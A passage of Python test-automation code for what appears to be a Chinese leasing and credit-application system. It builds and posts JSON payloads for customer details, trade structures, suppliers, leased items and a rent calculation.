\"idAddress\":res_query[\"data\"][\"personalInfoModels\"][0][\"idAddress\"],\n \"creditReportTime\":None,\n \"email\":\"666@163.com\",\n \"authId\":res_query[\"data\"][\"personalInfoModels\"][0][\"authId\"],\n \"idArray\":[\n \"110000\",\n \"110100\",\n \"110101\"\n ]\n }\n ],\n \"projCustEnterpriseVMList\":[\n {\n \"id\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"id\"],\n \"projectNo\": projectNo,\n \"sourceId\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"sourceId\"],\n \"projectCustomerInfoId\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"projectCustomerInfoId\"],\n \"roleType\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"roleType\"],\n \"name\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"name\"],\n \"idCardType\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"idCardType\"],\n \"idCardTypeName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"idCardTypeName\"],\n \"idCardNo\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"idCardNo\"],\n \"mobile\":None,\n \"country\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"country\"],\n \"countryName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"countryName\"],\n \"interIndustryClassifyOneName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"interIndustryClassifyOneName\"],\n \"interIndustryClassifyOne\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"interIndustryClassifyOne\"],\n \"interIndustryClassifyTwoName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"interIndustryClassifyTwoName\"],\n \"interIndustryClassifyTwo\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"interIndustryClassifyTwo\"],\n \"interIndustryClassifyThreeName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"interIndustryClassifyThreeName\"],\n \"interIndustryClassifyThree\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"interIndustryClassifyThree\"],\n \"interIndustryClassifyFourName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"interIndustryClassifyFourName\"],\n \"interIndustryClassifyFour\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"interIndustryClassifyFour\"],\n \"industryClassifyOneName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"industryClassifyOneName\"],\n \"industryClassifyOne\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"industryClassifyOne\"],\n \"industryClassifyTwoName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"industryClassifyTwoName\"],\n \"industryClassifyTwo\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"industryClassifyTwo\"],\n \"registrationProvinceName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"registrationProvinceName\"],\n \"registrationProvince\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"registrationProvince\"],\n \"registrationCityName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"registrationCityName\"],\n \"registrationCity\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"registrationCity\"],\n \"registrationRegionName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"registrationRegionName\"],\n \"registrationRegion\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"registrationRegion\"],\n \"registrationAddress\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"registrationAddress\"],\n \"officeProvinceName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"officeProvinceName\"],\n \"officeProvince\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"officeProvince\"],\n \"officeCityName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"officeCityName\"],\n \"officeCity\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"officeCity\"],\n \"officeLocationName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"officeLocationName\"],\n \"officeLocation\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"officeLocation\"],\n \"officeAddress\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"officeAddress\"],\n \"actualBusinessProvinceName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"actualBusinessProvinceName\"],\n \"actualBusinessProvince\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"actualBusinessProvince\"],\n \"actualBusinessCityName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"actualBusinessCityName\"],\n \"actualBusinessCity\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"actualBusinessCity\"],\n \"actualBusinessLocationName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"actualBusinessLocationName\"],\n \"actualBusinessLocation\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"actualBusinessLocation\"],\n \"actualBusinessAddress\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"actualBusinessAddress\"],\n \"rentStockholderRelated\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"rentStockholderRelated\"],\n \"rentRelated\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"rentRelated\"],\n \"ruralUrbanSignageName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"ruralUrbanSignageName\"],\n \"ruralUrbanSignage\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"ruralUrbanSignage\"],\n \"projectSourceName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"projectSourceName\"],\n \"projectSource\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"projectSource\"],\n \"licProjectInvestmentOneName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"licProjectInvestmentOneName\"],\n \"licProjectInvestmentOne\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"licProjectInvestmentOne\"],\n \"licProjectInvestmentTwoName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"licProjectInvestmentTwoName\"],\n \"licProjectInvestmentTwo\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"licProjectInvestmentTwo\"],\n \"licProjectInvestmentThreeName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"licProjectInvestmentThreeName\"],\n \"licProjectInvestmentThree\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"licProjectInvestmentThree\"],\n \"licProjectInvestmentFourName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"licProjectInvestmentFourName\"],\n \"licProjectInvestmentFour\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"licProjectInvestmentFour\"],\n \"businessScope\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"businessScope\"],\n \"mainBusinessProducts\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"mainBusinessProducts\"],\n \"enterpriseSizeName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"enterpriseSizeName\"],\n \"enterpriseSize\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"enterpriseSize\"],\n \"enterpriseType\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"enterpriseType\"],\n \"enterpriseTypeName\":None,\n \"institutionRegistCertNumber\":None,\n \"financialInstitutionCode\":None,\n \"holdingType\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"holdingType\"],\n \"holdingTypeName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"holdingTypeName\"],\n \"zhongzhengCode\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"zhongzhengCode\"],\n \"currencyName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"currencyName\"],\n \"currency\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"currency\"],\n \"registeredCapital\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"registeredCapital\"],\n \"paidinCapital\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"paidinCapital\"],\n \"capitalization\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"capitalization\"],\n \"revenue\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"revenue\"],\n \"establishmentTime\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"establishmentTime\"],\n \"businessLicenseExpirationDate\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"businessLicenseExpirationDate\"],\n \"businessStatus\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"businessStatus\"],\n \"businessStatusName\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"businessStatusName\"],\n \"employeeNumber\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"employeeNumber\"],\n \"legalRepresentative\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"legalRepresentative\"],\n \"legalRepresentativeMobile\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"legalRepresentativeMobile\"],\n \"idProvince\": \"120000\",\n \"idProvinceName\": None,\n \"idCity\": \"120100\",\n \"idCityName\": None,\n \"idLocation\": \"120101\",\n \"idLocationName\": None,\n \"idAddress\": res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"idAddress\"],\n \"legalPersonPhone\": res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"legalPersonPhone\"],\n \"actualController\": res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"actualController\"],\n \"nationalEconomy\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"nationalEconomy\"],\n \"nationalEconomyName\": res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"nationalEconomyName\"],\n \"listedCompanyLogoName\": res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"listedCompanyLogoName\"],\n \"listedCompanyLogo\":res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"listedCompanyLogo\"],\n \"resolutionType\": res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"resolutionType\"],\n \"resolutionTypeName\": res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"resolutionTypeName\"],\n \"email\": res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"email\"],\n \"authId\": res_query[\"data\"][\"projCustEnterpriseVMList\"][0][\"authId\"],\n \"shareholdingStructureList\": [],\n \"idArray\": [\"120000\", \"120100\", \"120101\"],\n \"internationalIndustryType\": [\"A\", \"A01\", \"A011\", \"A0111\"],\n \"registration\": [\"110000\", \"110100\", \"110101\"]\n }]\n }\n res = self.api(method = 'POST', url =url,json = data)\n\n '''交易结构-增加'''\n def projTradeAdd(self,projectNo):\n trade = []\n url = 'ifc/api/credit-apply/trades/addProjTrades'\n data = {\n \"projectNo\": projectNo\n }\n for i in range(9):\n res = self.api(method='POST', url=url, json=data)\n trade.append(res)\n return trade\n\n\n '''供应商保存'''\n def supplierSave(self, projectNo, custName, id_1, id_2, id_3, id_4, id_5, id_6, id_7, id_8, id_9):\n url = 'ifc/api/credit-apply/trades/saveSupplier'\n data = {\"xzw\": {\"supplierId\":\"9820\",\n \"supplierName\":\"测试Z500供应商合同公司1\",\n \"certId\":\"91350102315514081E\",\n \"artificialPerson\":\"夏紫文\",\n \"registerFullAddress\":\"110000|110100|110111;北京市|市辖区|房山区|123123\",\n \"businessAddress\":\"110000|110100|110111;北京市|市辖区|房山区|123123\"},\n \"jxw\": {\"supplierId\": \"9836\",\n \"supplierName\": \"测试Z500供应商合同公司J1\",\n \"certId\": \"91110000FB0RBU0R7P\",\n \"artificialPerson\": \"季晓伟\",\n \"registerFullAddress\": \"110000|110100|110101;北京市|市辖区|东城区\",\n \"businessAddress\": \"110000|110100|110101;北京市|市辖区|东城区\"},\n \"fht\": {\"supplierId\": \"9847\",\n \"supplierName\": \"测试供应商F1\",\n \"certId\": \"91410100732484450T\",\n \"artificialPerson\": \"范怀通\",\n \"registerFullAddress\": \"410000|410100|410102;河南省|郑州市|中原区|宇工路88号\",\n \"businessAddress\": \"410000|410100|410102;河南省|郑州市|中原区|宇工路88号\"},\n \"zll\": {\"supplierId\": \"9841\",\n \"supplierName\": \"测试Z500供应商合同公司J2\",\n \"certId\": \"91120000WH9CX8CE5N\",\n \"artificialPerson\": \"季晓伟\",\n \"registerFullAddress\": \"120000|120100|120101;天津市|市辖区|和平区\",\n \"businessAddress\": \"120000|120100|120101;天津市|市辖区|和平区\"},\n \"cm\": {\"supplierId\": \"9852\",\n \"supplierName\": \"测试Z500特斯拉\",\n \"certId\": \"91310115MA1H9YGWXX\",\n \"artificialPerson\": \"陈鸣\",\n \"registerFullAddress\": \"110000|110100|110105;北京市|市辖区|朝阳区|注册详细地址\",\n \"businessAddress\": \"110000|110100|110105;北京市|市辖区|朝阳区|注册详细地址\"}\n }\n list = []\n data_1 = {\n \"id\": None,\n \"projectNo\": projectNo,\n \"projTradesId\": id_1,\n \"supplierId\": data[custName][\"supplierId\"],\n \"supplierName\": data[custName][\"supplierName\"],\n \"certType\": \"200\",\n \"certId\": data[custName][\"certId\"],\n \"artificialPerson\": data[custName][\"artificialPerson\"],\n \"registerFullAddress\": data[custName][\"registerFullAddress\"],\n\t \"businessAddress\": data[custName][\"businessAddress\"],\n \"contacts\": None,\n \"phone\": None,\n \"openingBank\": None,\n \"openingBankNum\": None,\n \"account\": None,\n \"accountNo\": None,\n \"invoiceTitle\": None,\n \"taxQualification\": None,\n \"taxId\": None,\n \"taxTel\": None,\n \"taxAddress\": None,\n \"contractType\": None,\n \"tradeMode\": \"02\",\n \"tradeModeName\": \"货到付款\",\n \"settleMode\": \"BankAcceptanceBill\",\n \"settleModeName\": \"银行承兑汇票\",\n \"braceletInstallNode\": \"AfterPayment\",\n \"braceletInstallNodeName\": \"付款后安装\",\n \"productNodeType\": \"LS-DFL-I\",\n \"productNodeTypeName\": \"直接租赁\",\n \"isInstallBracelet\": 1,\n \"isInstallBraceletName\": \"是\",\n \"notePeriod\": \"01\",\n \"notePeriodName\": \"60天\",\n }\n data_2 = {\n \"id\": None,\n \"projectNo\": projectNo,\n \"projTradesId\": id_2,\n \"supplierId\": data[custName][\"supplierId\"],\n \"supplierName\": data[custName][\"supplierName\"],\n \"certType\": \"200\",\n \"certId\": data[custName][\"certId\"],\n \"artificialPerson\": data[custName][\"artificialPerson\"],\n \"registerFullAddress\": data[custName][\"registerFullAddress\"],\n\t \"businessAddress\": data[custName][\"businessAddress\"],\n \"contacts\": None,\n \"phone\": None,\n \"openingBank\": None,\n \"openingBankNum\": None,\n \"account\": None,\n \"accountNo\": None,\n \"invoiceTitle\": None,\n \"taxQualification\": None,\n \"taxId\": None,\n \"taxTel\": None,\n \"taxAddress\": None,\n \"contractType\": None,\n \"tradeMode\": \"02\",\n \"tradeModeName\": \"货到付款\",\n \"settleMode\": \"BankAcceptanceBill\",\n \"settleModeName\": \"银行承兑汇票\",\n \"braceletInstallNode\": \"AfterPayment\",\n \"braceletInstallNodeName\": \"付款后安装\",\n \"productNodeType\": \"LS-DFL-I\",\n \"productNodeTypeName\": \"直接租赁\",\n \"isInstallBracelet\": 1,\n \"isInstallBraceletName\": \"是\",\n \"notePeriod\": \"01\",\n \"notePeriodName\": \"60天\",\n }\n data_3 = {\n \"id\": None,\n \"projectNo\": projectNo,\n \"projTradesId\": id_3,\n \"supplierId\": data[custName][\"supplierId\"],\n \"supplierName\": data[custName][\"supplierName\"],\n \"certType\": \"200\",\n \"certId\": data[custName][\"certId\"],\n \"artificialPerson\": data[custName][\"artificialPerson\"],\n \"registerFullAddress\": data[custName][\"registerFullAddress\"],\n\t \"businessAddress\": data[custName][\"businessAddress\"],\n \"contacts\": None,\n \"phone\": None,\n \"openingBank\": None,\n \"openingBankNum\": None,\n \"account\": None,\n \"accountNo\": None,\n \"invoiceTitle\": None,\n \"taxQualification\": None,\n \"taxId\": None,\n \"taxTel\": None,\n \"taxAddress\": None,\n \"contractType\": None,\n \"tradeMode\": \"02\",\n \"tradeModeName\": \"货到付款\",\n \"settleMode\": \"BankAcceptanceBill\",\n \"settleModeName\": \"银行承兑汇票\",\n \"braceletInstallNode\": \"AfterPayment\",\n \"braceletInstallNodeName\": \"付款后安装\",\n \"productNodeType\": \"LS-DFL-I\",\n \"productNodeTypeName\": \"直接租赁\",\n \"isInstallBracelet\": 1,\n \"isInstallBraceletName\": \"是\",\n \"notePeriod\": \"01\",\n \"notePeriodName\": \"60天\",\n }\n\n\n data_4 = {\n \"id\": None,\n \"projectNo\": projectNo,\n \"projTradesId\": id_4,\n \"supplierId\": data[custName][\"supplierId\"],\n \"supplierName\": data[custName][\"supplierName\"],\n \"certType\": \"200\",\n \"certId\": data[custName][\"certId\"],\n \"artificialPerson\": data[custName][\"artificialPerson\"],\n \"registerFullAddress\": data[custName][\"registerFullAddress\"],\n\t \"businessAddress\": data[custName][\"businessAddress\"],\n \"contacts\": None,\n \"phone\": None,\n \"openingBank\": None,\n \"openingBankNum\": None,\n \"account\": None,\n \"accountNo\": None,\n \"invoiceTitle\": None,\n \"taxQualification\": None,\n \"taxId\": None,\n \"taxTel\": None,\n \"taxAddress\": None,\n \"contractType\": None,\n \"tradeMode\": \"02\",\n \"tradeModeName\": \"货到付款\",\n \"settleMode\": \"LetterCredit\",\n \"settleModeName\": \"信用证\",\n \"braceletInstallNode\": \"BeforePayment\",\n \"braceletInstallNodeName\": \"付款前安装\",\n \"productNodeType\": \"LS-DFL-I\",\n \"productNodeTypeName\": \"直接租赁\",\n \"isInstallBracelet\": 1,\n \"isInstallBraceletName\": \"是\",\n \"notePeriod\": \"01\",\n \"notePeriodName\": \"60天\",\n }\n data_5 = {\n \"id\": None,\n \"projectNo\": projectNo,\n \"projTradesId\": id_5,\n \"supplierId\": data[custName][\"supplierId\"],\n \"supplierName\": data[custName][\"supplierName\"],\n \"certType\": \"200\",\n \"certId\": data[custName][\"certId\"],\n \"artificialPerson\": data[custName][\"artificialPerson\"],\n \"registerFullAddress\": data[custName][\"registerFullAddress\"],\n\t \"businessAddress\": data[custName][\"businessAddress\"],\n \"contacts\": None,\n \"phone\": None,\n \"openingBank\": None,\n \"openingBankNum\": None,\n \"account\": None,\n \"accountNo\": None,\n \"invoiceTitle\": None,\n \"taxQualification\": None,\n \"taxId\": None,\n \"taxTel\": None,\n \"taxAddress\": None,\n \"contractType\": None,\n \"tradeMode\": \"02\",\n \"tradeModeName\": \"货到付款\",\n \"settleMode\": \"LetterCredit\",\n \"settleModeName\": \"��用证\",\n \"braceletInstallNode\": \"BeforePayment\",\n \"braceletInstallNodeName\": \"付款前安装\",\n \"productNodeType\": \"LS-DFL-I\",\n \"productNodeTypeName\": \"直接租赁\",\n \"isInstallBracelet\": 1,\n \"isInstallBraceletName\": \"是\",\n \"notePeriod\": \"01\",\n \"notePeriodName\": \"60天\",\n }\n data_6 = {\n \"id\": None,\n \"projectNo\": projectNo,\n \"projTradesId\": id_6,\n \"supplierId\": data[custName][\"supplierId\"],\n \"supplierName\": data[custName][\"supplierName\"],\n \"certType\": \"200\",\n \"certId\": data[custName][\"certId\"],\n \"artificialPerson\": data[custName][\"artificialPerson\"],\n \"registerFullAddress\": data[custName][\"registerFullAddress\"],\n\t \"businessAddress\": data[custName][\"businessAddress\"],\n \"contacts\": None,\n \"phone\": None,\n \"openingBank\": None,\n \"openingBankNum\": None,\n \"account\": None,\n \"accountNo\": None,\n \"invoiceTitle\": None,\n \"taxQualification\": None,\n \"taxId\": None,\n \"taxTel\": None,\n \"taxAddress\": None,\n \"contractType\": None,\n \"tradeMode\": \"02\",\n \"tradeModeName\": \"货到付款\",\n \"settleMode\": \"LetterCredit\",\n \"settleModeName\": \"信用证\",\n \"braceletInstallNode\": \"BeforePayment\",\n \"braceletInstallNodeName\": \"付款前安装\",\n \"productNodeType\": \"LS-DFL-I\",\n \"productNodeTypeName\": \"直接租赁\",\n \"isInstallBracelet\": 1,\n \"isInstallBraceletName\": \"是\",\n \"notePeriod\": \"01\",\n \"notePeriodName\": \"60天\",\n }\n\n\n\n data_7 = {\n \"id\": None,\n \"projectNo\": projectNo,\n \"projTradesId\": id_7,\n \"supplierId\": data[custName][\"supplierId\"],\n \"supplierName\": data[custName][\"supplierName\"],\n \"certType\": \"200\",\n \"certId\": data[custName][\"certId\"],\n \"artificialPerson\": data[custName][\"artificialPerson\"],\n \"registerFullAddress\": data[custName][\"registerFullAddress\"],\n\t \"businessAddress\": data[custName][\"businessAddress\"],\n \"contacts\": None,\n \"phone\": None,\n \"openingBank\": None,\n \"openingBankNum\": None,\n \"account\": None,\n \"accountNo\": None,\n \"invoiceTitle\": None,\n \"taxQualification\": None,\n \"taxId\": None,\n \"taxTel\": None,\n \"taxAddress\": None,\n \"contractType\": None,\n \"tradeMode\": \"01\",\n \"tradeModeName\": \"预付货款\",\n \"settleMode\": \"TelegraphicTransfer\",\n \"settleModeName\": \"转账\",\n \"braceletInstallNode\": \"AfterPayment\",\n \"braceletInstallNodeName\": \"付款后安装\",\n \"productNodeType\": \"LS-DFL-I\",\n \"productNodeTypeName\": \"直接租赁\",\n \"isInstallBracelet\": 1,\n \"isInstallBraceletName\": \"是\",\n \"notePeriod\": \"01\",\n \"notePeriodName\": None,\n }\n data_8 = {\n \"id\": None,\n \"projectNo\": projectNo,\n \"projTradesId\": id_8,\n \"supplierId\": data[custName][\"supplierId\"],\n \"supplierName\": data[custName][\"supplierName\"],\n \"certType\": \"200\",\n \"certId\": data[custName][\"certId\"],\n \"artificialPerson\": data[custName][\"artificialPerson\"],\n \"registerFullAddress\": data[custName][\"registerFullAddress\"],\n\t \"businessAddress\": data[custName][\"businessAddress\"],\n \"contacts\": None,\n \"phone\": None,\n \"openingBank\": None,\n \"openingBankNum\": None,\n \"account\": None,\n \"accountNo\": None,\n \"invoiceTitle\": None,\n \"taxQualification\": None,\n \"taxId\": None,\n \"taxTel\": None,\n \"taxAddress\": None,\n \"contractType\": None,\n \"tradeMode\": \"01\",\n \"tradeModeName\": \"预付货款\",\n \"settleMode\": \"TelegraphicTransfer\",\n \"settleModeName\": \"转账\",\n \"braceletInstallNode\": \"AfterPayment\",\n \"braceletInstallNodeName\": \"付款后安装\",\n \"productNodeType\": \"LS-DFL-I\",\n \"productNodeTypeName\": \"直接租赁\",\n \"isInstallBracelet\": 1,\n \"isInstallBraceletName\": \"是\",\n \"notePeriod\": \"01\",\n \"notePeriodName\": None,\n }\n data_9 = {\n \"id\": None,\n \"projectNo\": projectNo,\n \"projTradesId\": id_9,\n \"supplierId\": data[custName][\"supplierId\"],\n \"supplierName\": data[custName][\"supplierName\"],\n \"certType\": \"200\",\n \"certId\": data[custName][\"certId\"],\n \"artificialPerson\": data[custName][\"artificialPerson\"],\n \"registerFullAddress\": data[custName][\"registerFullAddress\"],\n\t \"businessAddress\": data[custName][\"businessAddress\"],\n \"contacts\": None,\n \"phone\": None,\n \"openingBank\": None,\n \"openingBankNum\": None,\n \"account\": None,\n \"accountNo\": None,\n \"invoiceTitle\": None,\n \"taxQualification\": None,\n \"taxId\": None,\n \"taxTel\": None,\n \"taxAddress\": None,\n \"contractType\": None,\n \"tradeMode\": \"01\",\n \"tradeModeName\": \"预付货款\",\n \"settleMode\": \"TelegraphicTransfer\",\n \"settleModeName\": \"转账\",\n \"braceletInstallNode\": \"AfterPayment\",\n \"braceletInstallNodeName\": \"付款后安装\",\n \"productNodeType\": \"LS-DFL-I\",\n \"productNodeTypeName\": \"直接租赁\",\n \"isInstallBracelet\": 1,\n \"isInstallBraceletName\": \"是\",\n \"notePeriod\": \"01\",\n \"notePeriodName\": None,\n }\n\n list.append(data_1)\n list.append(data_2)\n list.append(data_3)\n list.append(data_4)\n list.append(data_5)\n list.append(data_6)\n list.append(data_7)\n list.append(data_8)\n list.append(data_9)\n for i in list:\n res = self.api(method='POST', url=url, json=i)\n\n '''查询品牌'''\n def pageSerach(self):\n url = 'ifc/api/proj/pageSearchBrands'\n data = {\n \"searchParam\": \"\",\n \"current\": 1,\n \"size\": 50\n }\n res = self.api(method='POST', url=url, json=data)\n return res\n\n '''添加租赁物'''\n def leaseSave(self,projectNo,id):\n res = self.pageSerach()\n url = 'ifc/api/credit-apply/trades/saveLeasehold'\n data = {\n \"projectNo\": projectNo,\n \"projTradesId\": id,\n \"tradesLeaseholdList\": [{\n \"showMore\": True,\n \"projectNo\": \"\",\n \"projTradesId\": None,\n \"leaseholdName\": \"第一个租赁物\",\n \"brandId\": jsonpath.jsonpath(res,\"$..idArtlBrand\")[49],\n \"brandFullName\": jsonpath.jsonpath(res,\"$..brandFullName\")[49],\n \"spec\": \"123\",\n \"leaseholdType\": \"625304010101\",\n \"industryClassify\": [\"A\", \"A01\", \"A011\"],\n \"industryClassifyName\": \"\",\n \"industryClassifyOne\": \"A\",\n \"industryClassifyOneName\": \"\",\n \"industryClassifyTwo\": \"A01\",\n \"industryClassifyTwoName\": \"\",\n \"price\": \"10000.00\",\n \"amount\": \"1\",\n \"financeAmt\": 1000,\n \"financeScale\": \"10.00\",\n \"bookAmt\": \"10000.00\",\n \"isInstallBracelet\": 1,\n \"isLesseeRegisterAddress\": 1,\n \"isLesseeTheOwner\": 0,\n \"ownerType\": \"\",\n \"ownerName\": \"\",\n \"place\": [],\n \"placeProvince\": \"\",\n \"placeProvinceName\": \"\",\n \"placeCity\": \"\",\n \"placeCityName\": \"\",\n \"placeDistrict\": \"\",\n \"placeDistrictName\": \"\",\n \"placeDetailAddress\": \"\",\n \"directReversalUniqueIdentifier\": \"\",\n \"leaseholdTypeList\": [\"625001000000\", \"625101010000\", \"625201010100\", \"625304010101\"],\n \"leaseholdTypeOne\": \"625001000000\",\n \"leaseholdTypeTwo\": \"625101010000\",\n \"leaseholdTypeThree\": \"625201010100\",\n \"industryClassifyThree\": \"A011\",\n \"brandLevel\": jsonpath.jsonpath(res,\"$..brandLevel\")[49],\n \"facilityName\": jsonpath.jsonpath(res,\"$..facilityName\")[49]\n }]\n }\n res = self.api(method='POST', url=url, json=data)\n\n '''查询融资信息'''\n def financeQuery(self,projectNo,projTradesId):\n url = 'ifc/api/credit-apply/trades/queryFinanceInfo'\n data = {\n \"projectNo\": projectNo,\n \"projTradesId\": projTradesId\n }\n res = self.api(method='POST', url=url, json=data)\n\n return res\n\n '''租金测算'''\n def rentCalc(self,projectNo,projTradesId,id):\n url = 'ifc/api/credit-apply/trades/rentCalc'\n data = {\n \"projectNo\": projectNo,\n \"projTradesId\": projTradesId,\n \"id\": id,\n \"rateAppearMode\": \"Implication\",\n \"rateAppearModeName\": \"隐含利率\",\n \"lprBaseRate\": None,\n \"rentRate\": None,\n \"bpFloatValue\": None,\n \"preditRentDate\": str(datetime.datetime.now().date()),\n \"financeTerm\": 12,\n \"yearPaymentTimes\": \"12\",\n \"totalPaymentTimes\": \"12\",\n \"financeTotalAmt\": 1000,\n \"totalBookAmt\": \"10000.00\",\n \"financingPaymentDirection\": \"Supplier\",\n \"financingPaymentDirectionName\": \"供应商\",\n \"isExistDownPayment\": 1,\n \"isExistDownPaymentName\": \"是\",\n \"downPaymentCalcMode\": \"FIX_AMOUNT\",\n \"downPaymentCalcModeName\": \"固定金额\",\n \"downPaymentRatio\": 0.9,\n \"downPaymentAmt\": 9000,\n \"downPaymentPayDirection\": \"OurCompany\",\n \"downPaymentPayDirectionName\": None,\n \"isExistMargin\": 0,\n \"isExistMarginName\": None,\n \"marginCalcMode\": None,\n \"marginCalcModeName\": None,\n \"marginRatio\": None,\n \"marginAmt\": None,\n \"marginDeductMode\": None,\n \"marginDeductModeName\": None,\n \"retentionPriceAmt\": \"100.00\",\n \"discountAmt\": None,\n \"firstTermAmt\": None,\n \"rentalMode\": \"Postpay\",\n \"rentalModeName\": None,\n \"rentCalcMode\": \"EquivalentRent\",\n \"rentCalcModeName\": None,\n \"rentAmt\": \"100\",\n \"quickPaymentAmt\": None,\n \"rentTotalAmt\": None,\n \"interestTotalAmt\": None,\n \"recoveryPrincipalTotalAmt\": None,\n \"incomeTotalAmt\": None,\n \"xirrRate\": None,\n \"xirrPureRate\": None,\n \"irrRate\": None,\n \"irrPureRate\": None,\n \"financeSegmentList\": [],\n \"repayScheduleList\": []\n }\n res = self.api(method='POST', url=url, json=data)\n return res\n\n # def rentCalc(self,projectNo,projTradesId,id):\n # '''租金测算'''\n # url = 'ifc/api/credit-apply/trades/rentCalc'\n # data = {\n # \"projectNo\": projectNo,\n # \"projTradesId\": projTradesId,\n # \"id\": id,\n # \"rateAppearMode\": \"Implication\",\n # \"lprBaseRate\": None,\n # \"rentRate\": None,\n # \"bpFloatValue\": None,\n # \"preditRentDate\": datetime.datetime.now().date(),\n # \"financeTerm\": 12,\n # \"yearPaymentTimes\": \"12\",\n # \"totalPaymentTimes\": \"12\",\n # \"financeTotalAmt\": \"1000.00\",\n # \"totalBookAmt\": 10000,\n # \"financingPaymentDirection\": \"Supplier\",\n # \"financingPaymentDirectionName\": \"供应商\",\n # \"isExistDownPayment\": 1,\n # \"downPaymentCalcMode\": \"FIX_AMOUNT\",\n # \"downPaymentRatio\": 0.9,\n # \"downPaymentAmt\": 9000,\n # \"downPaymentPayDirection\": \"Supplier\",\n # \"isExistMargin\": 0,\n # \"isExistMarginName\": None,\n # \"marginCalcMode\": None,\n # \"marginRatio\": None,\n # \"marginAmt\": None,\n # \"marginDeductMode\": None,\n # \"retentionPriceAmt\": \"100.00\",\n # \"discountAmt\": None,\n # \"firstTermAmt\": None,\n # \"rentalMode\": \"Prepay\",\n # \"rentalModeName\": None,\n # \"rentCalcMode\": \"EquivalentRent\",\n # \"rentAmt\": \"100\",\n # \"quickPaymentAmt\": None,\n # \"rentTotalAmt\": None,\n # \"interestTotalAmt\": None,\n # 